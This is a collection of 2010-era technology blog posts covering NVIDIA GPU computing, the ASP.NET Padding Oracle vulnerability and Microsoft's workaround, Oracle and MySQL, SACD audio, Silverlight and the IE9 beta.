NVIDIA talks up GPU computing, presents roadmap

At the NVIDIA GPU Technology Conference in San Jose CEO Jen-Hsun Huang talked up the company’s progress in GPU computing, showed some example applications, and announced a high-level roadmap for future graphics chip architectures. NVIDIA has three areas of focus, he said: the Quadro line for visualisation, Tesla for parallel computing, and GeForce/Tegra for personal computing. Tegra is a system on a chip aimed at mobile devices. Mobile, says Huang, is “a completely disruptive force to all of computing.”

NVIDIA’s current chip architecture is called Fermi. The company is settling on a two-year product cycle and will deliver Kepler in 2011 with 3 to 4 times the performance (expressed as Gigaflops per watt) of Fermi. Maxwell in 2013 will have around 12 times the performance of Fermi. In between these architecture changes, NVIDIA will do “kicker” updates to refresh its products, with one for Fermi due soon.

The focus of the conference though is not on super-fast graphics cards in themselves, but rather on using the GPU for general purpose computing. GPUs are very, very good at doing mathematics fast and in parallel. If you have an application that does intensive calculations, then executing that part of the code on the GPU can offer impressive performance increases. NVIDIA’s CUDA library for C lets you do exactly that. Another option is OpenCL, a standard that works across GPUs from multiple vendors.

Adobe uses CUDA for the Mercury Playback engine in Creative Suite 5, greatly improving performance in After Effects, Premiere Pro and Photoshop, but with the annoyance that you have to use a compatible NVIDIA graphics card.

The performance gain from GPU programming is so great that it is unavoidable for applications in relevant areas, such as simulation or statistical analysis. Huang gave a compelling example during the keynote, bringing heart surgeon Dr Michael Black on stage to talk about his work. Operating on a beating heart is difficult because it presents a moving target. By combining robotic surgery with software that is able to predict the heart’s movement through simulation, he is researching how to operate on a heart almost as if it were stopped and with just a small incision.

Programming the GPU is compelling, but difficult. NVIDIA is keen to see it become part of mainstream programming, for obvious reasons, and there are new libraries and tools which help with this, like Parallel Nsight for Visual Studio 2010. Another interesting development, announced today, is CUDA for x86, being developed by PGI, which will let your CUDA code run even when an NVIDIA GPU is not present. Even if the performance gains are limited, it will mean developers who need to support diverse systems can run the same code, rather than having a different code path when no CUDA GPU is detected.

That said, GPU programming still has all the challenges of concurrent development, prone to race conditions and synchronization problems.

Stuffing a server full of GPUs is a cost-effective route to super-computing. I took a brief look at the exhibition, which includes this Colfax CXT8000 with 8 Tesla GPUs; it also has three 1200W power supplies. It may cost $25,000 but if you look at the performance you are getting for the price, machines like this are great value.

image

Crisis for ASP.Net – how serious is the Padding Oracle attack?

Security vulnerabilities are reported constantly, but some have more impact than others. The one that came into prominence last weekend (though it had actually been revealed several months ago) strikes me as potentially high impact. Colourfully named the Padding Oracle attack, it was explained and demonstrated at the ekoparty security conference. In particular, the researchers showed how it can be used to compromise ASP.NET applications:

The most significant new discovery is an universal Padding Oracle affecting every ASP.NET web application. In short, you can decrypt cookies, view states, form authentication tickets, membership password, user data, and anything else encrypted using the framework’s API! … The impact of the attack depends on the applications installed on the server, from information disclosure to total system compromise.

This is alarming simply because of the huge number of ASP.NET applications out there. It is not only a popular framework for custom applications, but is also used by Microsoft for its own applications. If you have a SharePoint site, for example, or use Outlook Web Access, then you are running an ASP.NET application.

The report was taken seriously by Microsoft, keeping VP Scott Guthrie and his team up all night, eventually coming up with a security advisory and a workaround posted to his blog. It does not make comfortable reading, confirming that pretty much every ASP.NET installation is vulnerable. A further post confirms that SharePoint sites are affected.

It does not help that the precise way the attack works is hard to understand. It is a cryptographic attack that lets the attacker decrypt data encrypted by the server. One of the consequences, thanks to what looks like another weakness in ASP.NET, is that the attacker can then download any file on the web server, including web.config, a file which may contain security-critical data such as database connection strings with passwords, or even the credentials of a user in Active Directory. The researchers demonstrate in a YouTube video how to crack a site running the DotNetNuke content management application, gaining full administrative rights to the application and eventually a login to the server itself.

Guthrie acknowledges that the problem can only be fixed by patching ASP.NET itself. Microsoft is working on this; in the meantime his suggested workaround is to configure ASP.NET to return the same error page regardless of what the underlying error really is. The reason for this is that the vulnerability involves inspecting the error returned by ASP.NET when you submit a corrupt cookie or viewstate data.

The most conscientious ASP.NET administrators will have followed Guthrie’s recommendations, and will be hoping that they are sufficient; it is not completely clear to me whether it is. One of the things that makes me think “hmmm” is that a more sophisticated workaround, involving random time delays before an error is returned, is proposed for later versions of ASP.NET that support it. What does that suggest about the efficacy of the simpler workaround, which is a static error page?

The speed with which the ASP.NET team came up with the workaround is impressive; but it is a workaround and not a fix. It leaves me wondering what proportion of ASP.NET sites exposed to the public internet will have implemented the workaround or do so before attacks are widespread?

A characteristic of the attack is that the web server receives thousands of requests which trigger cryptographic errors. Rather than attempting to fix up ASP.NET and every instance of web.config on a server, a more robust approach might be to monitor the requests and block IP numbers that are triggering repeated errors of this kind.

More generally, what should you do if you run a security-critical web application and a flaw of this magnitude is reported? Applying recommended workarounds is one possibility, but frankly I wonder if they should simply be taken offline until more is known about how to protect against it.

One thing about which I have no idea is the extent to which hackers are already trying this attack against likely targets such as ecommerce and banking sites. Of course in principle virtually any site is an attractive target, because of the value of compromised web servers for serving spam and malware.

If you run Windows servers and have not yet investigated, I recommend that you follow the links, read the discussions on Scott Guthrie’s blog, and at least implement the suggested actions.

RunRev renames product to LiveCode, supports iPad and iPhone but not Windows Phone 7

Runtime Revolution has renamed its software development IDE and runtime to LiveCode, which it says is a “modern descendent of natural-language technologies such as Apple’s HyperCard.” The emphasis is on easy and rapid development using visual development supplemented with script.

It is now a cross-platform development platform that targets Windows, Mac and Linux. Android is promised soon, there is a pre-release for Windows Mobile, and a new pre-release targets Apple’s iOS for iPad and iPhone.

LiveCode primarily creates standalone applications, but there is also a plug-in for hosting applets in the browser, though this option will not be available for iOS.

Now that Apple has lifted its restrictions on cross-platform development for iOS, it is Microsoft’s Windows Phone 7 that looks more of a closed device. The problem here is that Microsoft does not permit native code on Windows Phone 7, a restriction which also prohibits alternative runtimes such as LiveCode. You have to code applications in Silverlight or XNA. However, Adobe is getting a special pass for Flash, though it will not be ready in time for the first release of Windows Phone 7.

If Windows Phone 7 is popular, I imagine other companies will be asking for special passes. The ubiquity of Flash is one factor holding back Silverlight adoption, so in some ways it is surprising that Microsoft gives it favoured treatment, though it makes a nice selling point versus Apple’s iPhone.

Setup error raises obscure Outlook error message

I was intrigued by the following Outlook 2010 error message which I had not seen before:

image

Instant Search is not available when Outlook is running with administrator permissions. However, it was not. A Microsoft support note suggested another possible reason: Windows Search not running. However, it was running. It was clear though that Outlook searches were not being indexed, making them unusable on my low-powered netbook.

Eventually I figured it out. I’d just run an update for the excellent Battery Bar, which installs an batter monitor in the Windows 7 taskbar. In order to shut down the running instance, the Battery Bar setup restarted Explorer. Since the installer was running with elevated rights, Explorer had presumably restarted with elevated rights, and this somehow triggered the error in Outlook.

I recall that it it is tricky (but possible) for an elevated process to start a non-elevated process, so I guess Osiris needs to tweak its setup application.

The solution from my point of view was to restart Windows.

Salesforce.com is the wrong kind of cloud says Oracle’s Larry Ellison

Oracle CEO Larry Ellison took multiple jabs at Salesforce.com in the welcome keynote at OpenWorld yesterday.

He said it was old, not fault tolerant, not elastic, and built on a bad security model since all customers share the same application. “Elastic” in this context means able to scale on demand.

Ellison was introducing Oracle’s new cloud-in-a-box, the Exalogic Elastic Cloud. This features 30 servers and 360 cores packaged in a single cabinet. It is both a hardware and software product, using Oracle’s infiniband networking internally for fast communication and the Oracle VM for hosting virtual machines running either Oracle Linux or Solaris. Oracle is positioning Exalogic as the ideal machine for Java applications, especially if they use the Oracle WebLogic application server, and as a natural partner for the Exadata Database Machine.

Perhaps the most interesting aspect of Exalogic is that it uses the Amazon EC2 (Elastic Compute Cloud) API. This is also used by Eucalyptus, the open source cloud infrastructure adopted by Canonical for its Ubuntu Enterprise Cloud. With these major players adopting the Amazon API, you could almost call it as standard.

Ellison’s Exalogic cloud is a private cloud, of course, and although he described it as low maintenance it is nevertheless the customer’s responsibility to provide the site, the physical security and to take responsibility for keeping it up and running. Its elasticity is also open to question. It is elastic from the perspective of an application running on the system, presuming that there is spare capacity to run up some more VMs as needed. It is not elastic if you think of it as a single powerful server that will be eye-wateringly expensive; you pay for all of it even though you might not need all of it, and if your needs grow to exceed its capacity you have to buy another one – though Ellison claimed you could run the entire Facebook web layer on just a couple of Exalogics.

In terms of elasticity, there is actually an advantage in the Salesforce.com approach. If you share a single multi-tenanted application with others, then elasticity is measured by the ability of that application to scale on demand. Behind the scenes, new servers or virtual servers may come into play, but that is not something that need concern you. The Amazon approach is more hands-on, in that you have to work out how to spin up (or down) VMs as needed. In addition, running separate application instances for each customer means a larger burden of maintenance falling on the customer – which with a private cloud might mean an internal customer – rather than on the cloud provider.

In the end it is not a matter of right and wrong, more that the question of what is the best kind of cloud is multi-faceted. Do not believe all that you hear, whether the speaker is Oracle’s Ellison or Marc Benioff from Salesforce.com.

Incidentally, Salesforce.com runs on Oracle and Benioff is a former Oracle VP.

Postscript: as Dennis Howlett observes, the high capacity of Exalogic is actually a problem – he estimates that only 5% at most of Oracle’s customers could make use of such an expensive box. Oracle will address this by offering public cloud services, presumably sharing some of the same technology.

Why Oracle is immoveable in the Enterprise

At Oracle OpenWorld yesterday I spoke to an attendee from a global enterprise. His company is a big IBM customer and would like to standardise on DB2. To some extent it does, but there is still around 30% Oracle and significant usage of Microsoft SQL Server. Why three database platforms when they would prefer to settle on one? Applications, which in many cases are only certified for a specific database manager.

I was at MySQL Sunday earlier in the day, and asked whether he had any interest in Oracle’s open source database product. As you would expect, he said it was enough trouble maintaining three different systems; the last thing he wanted was a fourth.

Oracle: a good home for MySQL?

I’m not able to attend the whole of Oracle OpenWorld / JavaOne, but I have sneaked in to MySQL Sunday, which is a half-day pre-conference event. One of the questions that interests me: is MySQL in safe hands at Oracle, or will it be allowed to wither in order to safeguard Oracle’s closed-source database business?

It is an obvious question, but not necessarily a sensible one. There is some evidence for a change in direction. Prior to the takeover, the MySQL team was working on a database engine called Falcon, intended to lift the product into the realm of enterprise database management. Oracle put Falcon on the shelf; Oracle veteran Edward Screven (who also gave the keynote here) said that the real rationale for Falcon was that InnoDB would be somehow jiggered by Oracle, and that now both MySQL and InnoDB were at Oracle, it made no sense.

Context: InnoDB is the grown-up database engine for MySQL, with support for transactions, and already belonged to Oracle from an earlier acquisition.

There may be something in it; but it is also true that Oracle has fine-tuned the positioning of MySQL. Screven today emphasised that MySQL is Oracle’s small and nimble database manager; it is “quite performant and quite functional”, he said; the word “quite” betraying a measure of corporate internal conflict. Screven described how Oracle has improved the performance of MySQL on Windows and is cheerful about the possibility of it taking share from Microsoft’s SQL Server.

It is important to look at the actions as well as the words. Today Oracle announced the release candidate of MySQL 5.5, which uses InnoDB by default, and has performance and scalability improvements that are dramatic in certain scenarios, as well as new and improved tools. InnoDB is forging ahead, with the team working especially on taking better advantage of multi-core systems; we also heard about full text search coming to the engine.

The scalability of MySQL is demonstrated by some of its best-known deployments, including Facebook and Wikipedia. Facebook’s Mark Callaghan spoke today about making MySQL work well, and gave some statistics concerning peak usage: 450 million rows read per second, 3.5 million rows changed per second, query response time 4ms.

If pressed, Screven talks about complexity and reliability with critical data as factors that point to an Oracle rather than a MySQL solution, rather than lack of scalability.

In practice it matters little. No enterprise currently using an Oracle database is going to move to MySQL; aside from doubts over its capability, it is far too difficult and risky to switch your database manager to an alternative, since each one has its own language and its own optimisations. Further, Oracle’s application platform is built on its own database and that will not change. Customers are thoroughly locked in.

What this means is that Oracle can afford to support MySQL’s continuing development without risk of cannibalising its own business. In fact, MySQL presents an opportunity to get into new markets. Oracle is not the ideal steward for this important open source project, but it is working out OK so far.

SHM-SACD – super-expensive, but how super is the sound?

The problems facing the music industry are well-known: the CD market is fast disappearing thanks to digital downloads, both legal and illegal, and income gained from downloads does not look likely to match that lost from CD. But what about the niche market for recordings of superior quality? Universal Music Japan has come up with a product that combines several ideas. The first is SHM, or Super High Material, first used for CDs with the claim that, despite being a digital medium, players would extract better quality sound from CDs made with it. The next theory is that the high-resolution SACD format will play back more accurately if the disk only includes a stereo layer, rather than including stereo, multi-channel, and standard CD layers. The result is a new SHM-SACD series, remasters of classic titles at premium prices.

The source used for these titles varies. Some are new DSD (Direct Stream Digital, the digital format of SACD) master made from copy master tapes held in Japan. Some are re-issues of existing DSD transfers. Some are newly mastered from original master tapes.

Who’s Next is apparently in this last group, newly mastered from the original tapes. It is said to have been done as straight as possible,  with no equalization or compression, and is the original mix.

This is a favourite of mine, so I bought a copy. It comes in typically over-the-top Japanese packaging, SHM-SACD in a plastic film sleeve inside a paper sleeve inside a card sleeve. There is a fold-out cover with a photograph I’ve not seen before, liner notes, obi, and a card to return with suggestions for future titles.

image 

I played the disk and compared it to my existing CD. In fact, I must confess, I have several copies. Who’s Next has been issued many times, and the most obsessive fans know that the best CD is an early one mastered by Steve Hoffman and made in Japan for the US market. He has written about how he mastered it on his forum, using as little processing as possible though he did add some modest EQ.

Both the Hoffman CD and the new SACD sound very good. I am not quite sure which I prefer, but it may be the SACD which sounds exceptionally clean and lets you easily follow John Entwistle’s fantastic bass lines. Or it might be the Hoffman CD which is remarkably crisp and muscular. There is an odd problem with the SACD, which is that the last track is noticeably louder than the others. It was recorded separately, but that seems no reason not to match the volume.

So do I recommend the SACD, and by extension, the new SHM-SACD range? Well, I am all in favour of mastering CDs with full dynamic range, no attempt at noise reduction, minimal processing, and without the excessive compression that mars so many new releases. The Who’s Next title shows what great results you an get with this approach.

That said, it is tragic to have these high quality new remasters restricted to a niche format at an excessive price. The SHM thing I suspect is nonsense; if CDs and SACDs made with ordinary material did not work properly, we would have noticed it years ago. The advantages of SACD are doubtful too, certainly for stereo, because the limitations of human hearing make the extended frequency response pointless. I have researched this to the best of my ability and while I don’t know for sure that high-resolution formats like SACD are completely pointless, it does seem that standard CDs can sound either the same or nearly the same when the audible difference is put to the test with any rigour.

image

The SACD format is also rather inconvenient. You cannot easily rip to to a music server, you have to make a further digital copy from the analogue output of the SACD player, and then rip the copy, probably breaching your license in doing so, and potentially degrading the sound quality.

I also compared stereo-only and hybrid SACDs using Bob Dylan’s Blonde on Blonde, which was issued in both guises. The stereo version sounds identical.

Still, even you are paying for a certain amount of stuff and nonsense, you are also getting SACDs that genuinely sound good, at least in the case of Who’s Next. Perhaps it could even be worth it.

If Microsoft is serious about Silverlight, it needs to do Linux

Today was a significant event for the UK broadcasting industry: the announcement of YouView, formerly called Project Canvas, which is backed by partners including the BBC, ITV, Channel 4, Channel 5, and BT. It will provide broadcasts over IP, received by a set top box, include a catch-up service, and be capable of interactive features that hook into internet services.

Interesting stuff, though it may end up battling with Google TV. But what are the implications for media streaming services and media players? One is that they will have to run on Linux, which is the official operating system for Project Canvas. Google TV, for that matter, will run Android.

If you look at the YouView specifications, you’ll find that although the operating system is specified, the application player area is more open:

Application Player executables and libraries will be provided by 3rd party software vendors.

What is an application player?

Runtime environment for the execution of applications. Examples are Flash player, MHEG engine, W3C browser

I’d suggest that Adobe will do well out of YouView. Microsoft, on the other hand, will not be able to play in this space unless it delivers Silverlight for Linux, Android, and other open platforms.

Microsoft has a curious history of cross-platform Silverlight announcements. Early on it announced that Moonlight was the official Linux player, though in practice support for Moonlight has been half-hearted. Then when Intel announced the Atom Developer Program  (now AppUp) in September 2009, Microsoft stated that it would provide its own build of Silverlight for Linux, or rather, than Intel would build it with Microsoft’s code. Microsoft’s Brian Goldfarb told me that Microsoft and Intel would work together on bringing Silverlight to devices, while Moonlight would be the choice for desktop Linux.

Since then, the silence has been deafening. I’ve enquired about progress with both Intel and Microsoft, but vague rumours aside, no news. Silverlight is still listed as a future runtime for AppUp:

Microsoft® Silverlight™(future)

Silverlight is a cross-browser, cross-platform and cross-device browser plug-in that helps companies design, develop and deliver applications and experiences on the Web.

In the meantime, Adobe has gone ahead with its AIR runtime, and even if Silverlight eventually appears, has established an early presence on Intel’s netbook platform.

There have been recent rumours about internal battles between the Windows and Developer divisions at Microsoft, and I cannot help wondering if this is another symptom, with the Windows folk fighting against cross-platform Silverlight on the grounds that it could damage the Windows lock-in, while the Developer team tries to make Silverlight the ubiquitous runtime that it needs to be in order to succeed.

From my perspective, the answer is simple. Suppressing Silverlight will do nothing to safeguard Windows, whereas making it truly cross-platform could drive adoption of Microsoft’s server and cloud platform. When Silverlight was launched, just doing Windows and Mac was almost enough, but today the world looks different. If Microsoft is serious about WPF Everywhere, Linux and Android (which is Linux based) support is a necessity.

Microsoft Internet Explorer 9 beta is out

Head over to http://www.beautyoftheweb.com/ and you can download the beta of Internet Explorer 9, which is now up and running on my Windows 7 64-bit machine and looking good so far.

So what’s new? In terms of the rendering engine, this is like the last Platform Preview, but a little bit further along. During the briefing, we looked at at the experimental (and impressive) site put together by EMC, which shows 3D rotation of a motor vehicle along with other effects, put together entirely in HTML 5. At the time I only had the fourth platform preview installed, and the site did not work. Amusingly, I was advised to use Google Chrome, which worked fine. Now that I’ve installed the beta, the same site works in IE9, rather more smoothly than in Chrome.

What’s really new though is the user interface. The two things that jump out are the adoption of a single box for search and URL entry – many users do not understand the difference anyway – and the ability to drag tabs to the taskbar to pin them there like application shortcuts. Once pinned, they support Windows 7 Jump Lists, even when the site is not active:

image

If you squint at this screenshot, you’ll notice that the Discovery site, which is tweaked to use this feature, has a good-looking icon as well as a Jump List, whereas the icons adjacent to it look bad. That’s because you need to create a new large favicon to support this feature, as well as optionally adding metadata to create the Jump List. None of this is any use, of course, if you use Vista; and if you use XP you cannot even install IE9.

There’s also a download manager at last.

There’s no doubt that IE9 is miles better than IE8. Is it better than rivals like Chrome, from which a casual observer might think it has drawn inspiration? Too soon to say; but using the official native browser does have advantages, like integration with Windows Update as well integration with the OS.

That said, I’m not personally a big fan of the single box approach, and I’ll miss the permanent menus. If you press the Alt key the old File, Edit View etc magically appear, but I can’t see any way to make it persist.